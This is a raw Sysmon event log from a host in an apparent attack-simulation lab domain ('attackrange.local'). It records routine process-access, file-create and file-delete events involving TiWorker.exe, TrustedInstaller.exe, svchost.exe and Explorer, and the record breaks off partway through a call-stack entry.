11241100x80000000000000005823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.191{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEC:\Users\Administrator\Links\Desktop.lnk2021-03-31 10:51:16.250 23542300x80000000000000005822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.191{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\Links\Desktop.lnkMD5=D5CF13D810C697DFC19F42E6D44FE391,SHA256=CDE1DBC52A9ED24304BE4A6EB10EBDD3C80F7016F136519CA3504F04539988E9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.144{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\nt
dll.dll+1ecb9 10341000x80000000000000005820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.144{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:23.129{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:23.129{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:23.129{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:23.129{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000005815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.097{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms~RF1a591.TMPMD5=7C48245AD0469DDD015E149B30FB537C,SHA256=C0CF031EF27DA4582BF1A84C5316C9A088FBBBCE993CE99DC5864FD229B5D52F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:23.051{266CAFBE-64C5-6064-A500-00000000AE01}4356ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms~RF1a563.TMPMD5=561CBEC334F373ABD89813D662818FC2,SHA256=05C52D17DC7C00612129BCF55F3569B7704C9C1EAE982B1320303C989F5A7C5C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.004{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:23.004{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:23.004{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:23.004{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005909Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.997{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+24
4c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005908Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.982{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005907Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.982{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005906Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.966{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.951{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.951{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.951{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:24.935{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1